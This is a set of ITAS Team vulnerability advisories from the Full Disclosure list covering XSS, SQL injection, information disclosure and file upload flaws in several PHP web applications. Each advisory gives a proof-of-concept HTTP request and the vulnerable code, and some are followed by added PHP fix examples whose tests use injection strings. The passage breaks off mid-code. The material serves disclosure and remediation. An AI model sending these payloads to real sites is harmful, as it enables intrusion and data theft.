[FD] Cross-Site Scripting | Zeuscart V4
#Vulnerability: Cross-Site Scripting
#Vendor: http://www.zeuscart.com
#Download link: http://zeuscart.com/download/
#Affected version: Zeuscart V4
#CVSS v3.0 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
#Condition: The attack is performed by an "Anonymous User"
#Payload: "--><ScRipt>alert(/ITASVN/)</ScRipT>
#Fix version: N/A
#Author: Dang Quoc Thai (thai.q.d...@itas.vn) and ITAS Team

::PROOF OF CONCEPT::

+ REQUEST
GET /index.php?do=search&search=%22--%3E%3CScRipt%3Ealert(/ITASVN/)%3C/ScRipT%3E HTTP/1.1
Host: demo.target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.target.com/demo/
Cookie: PHPSESSID=0f9ce01d2822471dee23af07947e9074
Connection: keep-alive

+ RESPONSE
HTTP/1.1 200 OK
Date: Mon, 02 Nov 2015 02:21:55 GMT
Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25032

...
http://demo.target.com/index.php?do=index";>http://demo.target.com/images/logo/20151012210547_sell_logo.png"; alt="ZeusCart">
alert(/ITASVN/)" onclick="searchitem();"> Search
http://demo.target.com/index.php?do=showcart";>Shopping Cart - 0 Items
...

::REFERENCE::
- http://www.itas.vn/en/itas-team-found-out-a-cross-site-scripting-vulnerability-in-zeuscart-cms/
- https://www.youtube.com/watch?v=CPgzAra_mXw

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Wordpress plugin Simple Ads Manager - Information Disclosure
#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2826
#Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team

::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users

+ Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats, ...
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Image: http://www.itas.vn/uploads/newsother/disclosure.png

+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en

Best regards,
----
ITAS Team (www.itas.vn)
[FD] Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.t...@itas.vn) & ITAS Team

::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---10898951822009521617421026
Content-Length: 683

-----10898951822009521617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

-----10898951822009521617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----10898951822009521617421026--

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 303 to 314

case 'sam_ajax_upload_ad_image':
  if(isset($_POST['path'])) {
    $uploadDir = $_POST['path'];
    $file = $uploadDir . basename($_FILES['uploadfile']['name']);
    if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
      $out = array('status' => "success");
    } else {
      $out = array('status' => "error");
    }
  }
  break;

+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI

Best regards,
ITAS Team (www.itas.vn)
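The two Simple Ads Manager advisories above (the unauthenticated sam-ajax-admin.php actions and the upload handler) have one root cause: the file is reachable without any WordPress capability or nonce check, and the upload branch then takes the destination directory from $_POST['path'] and keeps the client's file name. The script below is an added example, not code from the plugin or from ITAS. It runs stand-alone on the PHP CLI and assumes only the fileinfo extension and a writable temp directory; the WordPress gate the real handler also needs (check_ajax_referer() plus current_user_can('upload_files') before anything else runs) is named in the comments but left out so the script runs without WordPress.

```php
<?php
// Added example (not Simple Ads Manager or ITAS code). The handler quoted in
// the advisory takes the destination directory from $_POST['path'] and keeps
// the client's file name, so an unauthenticated request can drop info.php
// anywhere the web server user can write. This validator fixes the directory
// server-side, allows only image extensions, checks that the bytes really are
// an image, and chooses the stored name itself.
// Assumptions: PHP CLI, the fileinfo extension, writable sys_get_temp_dir().
// Inside the plugin the function would run only after check_ajax_referer()
// and current_user_can('upload_files'); those calls are omitted here.

final class UploadRejected extends RuntimeException {}

const ALLOWED_IMAGES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one $_FILES entry and return the path it may be stored at.
 * $uploadDir is chosen by the server; nothing from the request goes into it.
 */
function safe_upload_target(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_file($file['tmp_name'])) {
        throw new UploadRejected('upload failed or missing');
    }
    // Extension allowlist on the client-supplied name; the name itself is not reused.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGES[$ext])) {
        throw new UploadRejected("extension '$ext' is not allowed");
    }
    // Content check: the sniffed MIME type must agree with the extension and
    // the bytes must parse as an image, so a PHP script renamed to .gif fails.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_IMAGES[$ext] || @getimagesize($file['tmp_name']) === false) {
        throw new UploadRejected("content ($mime) is not a valid $ext image");
    }
    $base = realpath($uploadDir);
    if ($base === false || !is_dir($base) || !is_writable($base)) {
        throw new UploadRejected('upload directory is missing or not writable');
    }
    // Random server-generated name: no client path, no traversal, no collisions.
    return $base . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Build a $_FILES-shaped entry from constructed bytes (test input only). */
function fake_upload(string $clientName, string $bytes): array
{
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $clientName, 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK, 'size' => strlen($bytes)];
}

$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sam_uploads_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);

// A 1x1 transparent GIF (constructed) stands in for a legitimate ad image.
$gif1x1 = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$cases = [
    'info.php'  => fake_upload('info.php', "<?php phpinfo();"),           // the advisory's file
    'shell.gif' => fake_upload('shell.gif', "<?php echo 'not an image';"), // script behind an image extension
    'logo.gif'  => fake_upload('logo.gif', $gif1x1),                       // genuine image
];
$accepted = [];
foreach ($cases as $label => $file) {
    try {
        $dest = safe_upload_target($file, $dir);
        // The real handler would now call move_uploaded_file($file['tmp_name'], $dest).
        $accepted[] = $label;
        echo "$label: accepted as " . basename($dest) . "\n";
    } catch (UploadRejected $e) {
        echo "$label: rejected ({$e->getMessage()})\n";
    }
    unlink($file['tmp_name']);
}
rmdir($dir);
assert($accepted === ['logo.gif']);
```

The upload directory should also sit under a path where the web server is configured not to execute scripts, so that even a future allowlist mistake does not turn a stored file into code.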
[FD] Multiple SQL Injection
#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h...@itas.vn) & ITAS Team

::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3

- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

case 'sam_ajax_sam_hits':
  if(isset($_POST['hits']) && is_array($_POST['hits'])) {
    $hits = $_POST['hits'];
    $values = '';
    $remoteAddr = $_SERVER['REMOTE_ADDR'];
    foreach($hits as $hit) {
      $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
    }
    $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
    $result = $wpdb->query($sql);
    if($result > 0)
      echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
    else
      echo json_encode(array(
        'success' => false,
        'result' => $result,
        'sql' => $sql,
        'hits' => $hits,
        'values' => $values
      ));
  }
  break;

---SQL INJECTION 2---

+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:

case 'sam_ajax_load_posts':
  $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
  $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
  $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';
  //set @row_num = 0;
  //SELECT @row_num := @row_num + 1 AS recid
  $sql = "SELECT wp.id, wp.post_title AS title, wp.post_type AS type FROM $postTable wp WHERE wp.post_status = 'publish' AND FIND_IN_SET(wp.post_type, 'post,page{$custs}') ORDER BY wp.id;";
  $posts = $wpdb->get_results($sql, ARRAY_A);
  $k = 0;
  foreach($posts as &$val) {
    switch($val['type']) {
      case 'post': $val['type'] = $sPost; break;
      case 'page': $val['type'] = $sPage; break;
      default: $val['type'] = $sPost . ': ' . $val['type']; break;
    }
    $k++;
    $val['recid'] = $k;
  }
  $out = array(
    'status' => 'success',
    'total' => count($posts),
    'records' => $posts
  );
  break;

---SQL INJECTION 3---

+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.
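Both Simple Ads Manager handlers quoted in the SQL injection advisory build the statement by splicing request values into its text: the sam_hits branch drops each `$hit[0]`/`$hit[1]` straight into a VALUES row, and load_posts appends `cstr` to the quoted list inside FIND_IN_SET(). The script below is an added example, not code from the plugin or from ITAS. It assumes PHP CLI with the pdo_sqlite extension and uses in-memory tables in place of the plugin's `$sTable` and the posts table; inside WordPress the same construction is `$wpdb->prepare()` with `%d`/`%s` placeholders and an `implode()`'d placeholder list for the variable-length part.

```php
<?php
// Added example (not Simple Ads Manager or ITAS code). Both handlers in the
// advisory splice request values into SQL text: "({$hit[1]}, {$hit[0]}, ...)"
// in sam_hits and 'post,page{$custs}' in load_posts. The fix for both is to
// keep the SQL text constant and bind every value, however many there are.
// Assumptions: PHP CLI with the pdo_sqlite extension; in-memory SQLite tables
// stand in for the plugin's $sTable and the posts table.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sam_stats (id INTEGER, pid INTEGER, event_time TEXT, event_type INTEGER, remote_addr TEXT)');
$db->exec('CREATE TABLE wp_posts (id INTEGER, post_title TEXT, post_type TEXT, post_status TEXT)');
$db->exec("INSERT INTO wp_posts VALUES (1,'Hello','post','publish'), (2,'About','page','publish'),
           (3,'Promo','ad','publish'), (4,'Secret','ad','private')");

/**
 * Record ad hits. $hits has the plugin's request shape, one [adId, placeId]
 * pair per entry; every element is validated as an integer and bound, so a
 * string in either position is rejected before any SQL is built.
 */
function record_hits(PDO $db, array $hits, string $remoteAddr): int
{
    $rows = [];
    $params = [];
    $intOpts = ['options' => ['min_range' => 0]];
    foreach ($hits as $hit) {
        if (!is_array($hit) || !isset($hit[0], $hit[1]) || count($hit) !== 2
            || filter_var($hit[0], FILTER_VALIDATE_INT, $intOpts) === false
            || filter_var($hit[1], FILTER_VALIDATE_INT, $intOpts) === false) {
            throw new InvalidArgumentException('each hit must be [adId, placeId] with integer values');
        }
        // Same column order as the plugin: id <- $hit[1], pid <- $hit[0].
        $rows[] = '(?, ?, CURRENT_TIMESTAMP, 0, ?)';
        array_push($params, (int) $hit[1], (int) $hit[0], $remoteAddr);
    }
    if ($rows === []) {
        return 0;
    }
    $stmt = $db->prepare('INSERT INTO sam_stats (id, pid, event_time, event_type, remote_addr) VALUES '
        . implode(', ', $rows));
    $stmt->execute($params);
    return $stmt->rowCount();
}

/**
 * Published posts of the built-in types plus caller-supplied custom types.
 * The plugin appended $_REQUEST['cstr'] to the quoted list inside
 * FIND_IN_SET(); here each type is one placeholder in an IN (...) list.
 */
function load_posts(PDO $db, array $customTypes): array
{
    $types = array_merge(['post', 'page'], array_values($customTypes));
    $placeholders = implode(', ', array_fill(0, count($types), '?'));
    $stmt = $db->prepare("SELECT id, post_title AS title, post_type AS type FROM wp_posts
                          WHERE post_status = 'publish' AND post_type IN ($placeholders) ORDER BY id");
    $stmt->execute($types);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs. The first hits payload carries the advisory's injection
// shape in the id position; it never reaches the database.
try {
    record_hits($db, [[1, 2], ['3, 4, NOW(), 0, "x"); DROP TABLE sam_stats; --', 5]], '203.0.113.9');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
assert(record_hits($db, [[1, 2], [3, 4]], '203.0.113.9') === 2);

// A custom type that would have closed the quoted list in the original query
// is now only a string the IN list compares against; the private row stays hidden.
$rows = load_posts($db, ["ad') OR 1=1 --", 'ad']);
assert(array_column($rows, 'title') === ['Hello', 'About', 'Promo']);
echo count($rows) . " published posts returned\n";
```

Note that the original sam_hits handler also echoes the failed SQL statement and the raw `hits` array back to the caller in its error branch, which hands an attacker the exact query text for refining a payload; an error response should carry only a status.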
[FD] Community Gallery - Stored Cross-Site Scripting vulnerability
#Vulnerability title: Community Gallery - Stored Cross-Site Scripting vulnerability
#Product: Community Gallery
#Vendor: https://www.woltlab.com
#Affected version: Community Gallery 2.0 before 12/10/2014
#Download link: https://www.woltlab.com/purchase/?products[]=com.woltlab.gallery
#Fixed version: Community Gallery 2.0 after 12/26/2014
#CVE ID: CVE-2015-2275
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)

::PROOF OF CONCEPT::

+ REQUEST:
POST /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b6512d9eed HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target/7788bdbc/gallery/index.php/ImageEdit/7/
Content-Length: 1300
Cookie: wcf_cookieHash=f774ed47049756db7f6f635748b497cf08b6fef3; __cfduid=dceb0da13e569549c9531d07b3d287acb1420598620
Authorization: Basic Nzc4OGJkYmM6OWM1NWE3OWM=
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

actionName=saveImageData&className=gallery%5Cdata%5Cimage%5CImageAction&objectIDs%5B%5D=7&parameters%5Bdata%5D%5B7%5D%5BalbumID%5D=1&parameters%5Bdata%5D%5B7%5D%5BcategoryIDs%5D%5B%5D=3&parameters%5Bdata%5D%5B7%5D%5Bdescription%5D=test&parameters%5Bdata%5D%5B7%5D%5BenableComments%5D=1&parameters%5Bdata%5D%5B7%5D%5Bfilename%5D=HoaMai1.jpg&parameters%5Bdata%5D%5B7%5D%5Bfilesize%5D=47948&parameters%5Bdata%5D%5B7%5D%5Bheight%5D=480&parameters%5Bdata%5D%5B7%5D%5BimageID%5D=7&parameters%5Bdata%5D%5B7%5D%5Blatitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Blongitude%5D=0&parameters%5Bdata%5D%5B7%5D%5Borientation%5D=1&parameters%5Bdata%5D%5B7%5D%5Btags%5D%5B%5D=testing&parameters%5Bdata%5D%5B7%5D%5BthumbnailHeight%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailWidth%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailX%5D=0&parameters%5Bdata%5D%5B7%5D%5BthumbnailY%5D=0&parameters%5Bdata%5D%5B7%5D%5BtinyURL%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e-tiny.jpg&parameters%5Bdata%5D%5B7%5D%5Btitle%5D=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parameters%5Bdata%5D%5B7%5D%5Burl%5D=http%3A%2F%2Fdemo.woltlab.com%2F7788bdbc%2Fgallery%2FuserImages%2F21%2F7-2147cd1e.jpg&parameters%5Bdata%5D%5B7%5D%5Bwidth%5D=640&parameters%5Bdata%5D%5B7%5D%5Blocation%5D=&parameters%5BisEdit%5D=1

- Vulnerable parameter: parameters[data][7][title]

::DISCLOSURE::
+ 12/10/2014: Detected vulnerability
+ 12/10/2014: Sent vulnerability details to vendor
+ 03/11/2015: Published information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-stored-xss-vulnerability-in-burning-board-community-gallery-77.html

::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

----
ITAS Team (itas.t...@itas.vn)
[FD] ProjectSend r561 - SQL injection vulnerability
#Vulnerability title: ProjectSend r561 - SQL injection vulnerability
#Product: ProjectSend r561
#Vendor: http://www.projectsend.org/
#Affected version: ProjectSend r561
#Download link: http://www.projectsend.org/download/67/
#Fixed version: N/A
#Author: Le Ngoc Phi (phi.n...@itas.vn) & ITAS Team (www.itas.vn)

::PROOF OF CONCEPT::

+ REQUEST:
GET /projectsend/users-edit.php?id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: 54f8105d859e0_SESSION=q6tjpjjbt53nk1o5tnbv2123456; PHPSESSID=jec50hu4plibu5p2p6hnvpcut6
Connection: keep-alive

- Vulnerable file: client-edit.php
- Vulnerable parameter: id
- Vulnerable code:

if (isset($_GET['id'])) {
	$client_id = mysql_real_escape_string($_GET['id']);
	/**
	 * Check if the id corresponds to a real client.
	 * Return 1 if true, 2 if false.
	 **/
	$page_status = (client_exists_id($client_id)) ? 1 : 2;
}
else {
	/**
	 * Return 0 if the id is not set.
	 */
	$page_status = 0;
}

/**
 * Get the clients information from the database to use on the form.
 */
if ($page_status === 1) {
	$editing = $database->query("SELECT * FROM tbl_users WHERE id=$client_id");
	while($data = mysql_fetch_array($editing)) {
		$add_client_data_name = $data['name'];
		$add_client_data_user = $data['user'];
		$add_client_data_email = $data['email'];
		$add_client_data_addr = $data['address'];
		$add_client_data_phone = $data['phone'];
		$add_client_data_intcont = $data['contact'];
		if ($data['notify'] == 1) {
			$add_client_data_notity = 1;
		}
		else {
			$add_client_data_notity = 0;
		}
		if ($data['active'] == 1) {
			$add_client_data_active = 1;
		}
		else {
			$add_client_data_active = 0;
		}
	}
}

::DISCLOSURE::
+ 01/06/2015: Detected vulnerability
+ 01/07/2015: Contacted vendor
+ 01/08/2015: Sent vulnerability details to vendor; vendor did not reply
+ 03/05/2015: Published information

::REFERENCE::
- http://www.itas.vn/news/itas-team-found-out-a-SQL-Injection-vulnerability-in-projectsend-r561-76.html

Best Regards,
- ITAS Team (www.itas.vn)
[FD] Redaxscript CMS 2.2.0 - SQL Injection vulnerability
#Vulnerability title: Redaxscript CMS 2.2.0 - SQL Injection vulnerability
#Vendor: http://redaxscript.com/
#Product: Redaxscript CMS
#Software link: http://redaxscript.com/download/releases
#Affected version: Redaxscript 2.2.0
#Fixed version: Redaxscript 2.3.0
#CVE ID: CVE-2015-1518
#Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS Team (www.itas.vn)

:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search

- Vulnerable parameter: $search_terms
- Vulnerable file: redaxscript/includes/search.php
- Vulnerable function: search_post()
- Vulnerable code:

function search_post()
{
	/* clean post */
	if (ATTACK_BLOCKED < 10)
	{
		$search_terms = clean($_POST['search_terms'], 5);
	}

	/* validate post */
	if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
	{
		$error = l('input_incorrect');
	}

	/* query results */
	else
	{
		$search = array_filter(explode(' ', $search_terms));
		$search_keys = array_keys($search);
		$last = end($search_keys);

		/* query search */
		$query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
		if ($search)
		{
			$query .= ' && (';
			foreach ($search as $key => $value)
			{
				$query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
				if ($last != $key)
				{
					$query .= ' || ';
				}
			}
			$query .= ')';
		}
		$query .= ' ORDER BY date DESC LIMIT 50';
		$result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
		$num_rows = count($result);
		if ($result == '' || $num_rows == '')
		{
			$error = l('search_no');
		}

		/* collect output */
		else if ($result)
		{
			$accessValidator = new Redaxscript\Validator\Access();
			$output = '' . l('search') . '';
			$output .= form_element('fieldset', '', 'set_search_result', '', '', '' . l('articles') . '') . '';
			foreach ($result as $r)
			{
				$access = $r['access'];

				/* if access granted */
				if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
				{
					if ($r)
					{
						foreach ($r as $key => $value)
						{
							$$key = stripslashes($value);
						}
					}

					/* prepare metadata */
					if ($description == '')
					{
						$description = $title;
					}
					$date = date(s('date'), strtotime($date));

					/* build route */
					if ($category == 0)
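The search_post() code quoted above splices every space-separated term into a chain of LIKE '%term%' clauses, so the statement text changes with the request. The script below is an added example, not code from Redaxscript or from ITAS. It assumes PHP CLI with the pdo_sqlite extension and an in-memory table standing in for the articles table, keeps the same four-column OR-of-LIKEs, but binds one parameter per (term, column) pair and escapes LIKE's own metacharacters, a second detail that binding alone does not cover.

```php
<?php
// Added example (not Redaxscript or ITAS code). search_post() in the advisory
// splices each space-separated term into LIKE '%term%' clauses, so the
// statement text changes with the input. This version keeps the OR-of-LIKEs
// over the same four columns but binds one parameter per (term, column) pair,
// and escapes % and _ so a term is matched literally instead of acting as a
// wildcard. Assumptions: PHP CLI with the pdo_sqlite extension; the in-memory
// articles table and its rows are constructed for the example.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER, title TEXT, description TEXT, keywords TEXT, text TEXT,
           language TEXT, status INTEGER, date TEXT)');
$db->exec("INSERT INTO articles VALUES
  (1, 'Release notes', '2.2.0 changes', 'cms,release', 'Details of 100% of the changes', 'en', 1, '2015-01-02'),
  (2, 'Hidden draft', 'not public', '', 'unpublished', 'en', 0, '2015-01-03'),
  (3, 'Team', 'about', 'about', 'Das Team', 'de', 1, '2015-01-04')");

/** Wrap a term in % for a contains-search, escaping LIKE metacharacters first. */
function like_contains(string $term): string
{
    return '%' . strtr($term, ['\\' => '\\\\', '%' => '\\%', '_' => '\\_']) . '%';
}

function search_articles(PDO $db, string $searchTerms, string $language): array
{
    if (strlen($searchTerms) < 3) {            // same minimum length as the original
        return [];
    }
    $terms = array_values(array_filter(explode(' ', $searchTerms), 'strlen'));
    if ($terms === []) {
        return [];
    }
    $columns = ['title', 'description', 'keywords', 'text'];
    $clauses = [];
    $params = [':lang' => $language];
    foreach ($terms as $i => $term) {
        foreach ($columns as $column) {
            $name = ":t{$i}_{$column}";
            $clauses[] = "$column LIKE $name ESCAPE '\\'";
            $params[$name] = like_contains($term);
        }
    }
    $sql = "SELECT id, title FROM articles WHERE (language = :lang OR language = '') AND status = 1 AND ("
         . implode(' OR ', $clauses) . ') ORDER BY date DESC LIMIT 50';
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function result_ids(array $rows): array
{
    return array_map('intval', array_column($rows, 'id'));
}

// Constructed inputs. A quote-closing tautology is bound as data and matches
// nothing; the unpublished and German rows are never exposed.
assert(result_ids(search_articles($db, "zzz' OR 1=1 --", 'en')) === []);

// Literal matching: '100%' finds the row containing that text, while '100_'
// does not become "100 followed by any character".
assert(result_ids(search_articles($db, '100%', 'en')) === [1]);
assert(result_ids(search_articles($db, '100_', 'en')) === []);
echo "search OK\n";
```

The wildcard escaping matters beyond correctness: without it a single `%` term matches every row, and a long list of `_` and `%` terms across four columns is a cheap way to make the search scan the whole table on every request.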
[FD] Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities
# Exploit Title: Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities
# Vendor: http://www.sefrengo.org/
# Download link: http://forum.sefrengo.org/index.php?showtopic=3368 (https://github.com/sefrengo-cms/sefrengo-1.x/tree/22c0d16bfd715631ed317cc990785ccede478f07)
# CVE ID: CVE-2015-1428
# Vulnerability: SQL Injection
# Affected version: Sefrengo CMS v1.6.1
# Fixed version: Sefrengo CMS v1.6.2
# Author: Nguyen Hung Tuan (tuan.h.ngu...@itas.vn) & ITAS Team (www.itas.vn)

::PROOF OF CONCEPT::

Link 1:
- Vulnerable file: /backend/external/phplib/ct_sql.inc
- Vulnerable function: function ac_get_value($id, $name)
- Vulnerable parameter: $id
- Vulnerable code:

function ac_get_value($id, $name) {
  global $cms_db;
  $this->db->query(sprintf("select val from %s where sid = '%s' and name = '%s'", $cms_db['sessions'], $id, addslashes($name)));
  if ($this->db->next_record()) {
    $str = $this->db->f("val");
    $str2 = base64_decode( $str );
    if ( ereg("^".$name.":.*", $str2) ) {
      $str = ereg_replace("^".$name.":", "", $str2 );
    } else {
      $str3 = stripslashes( $str );
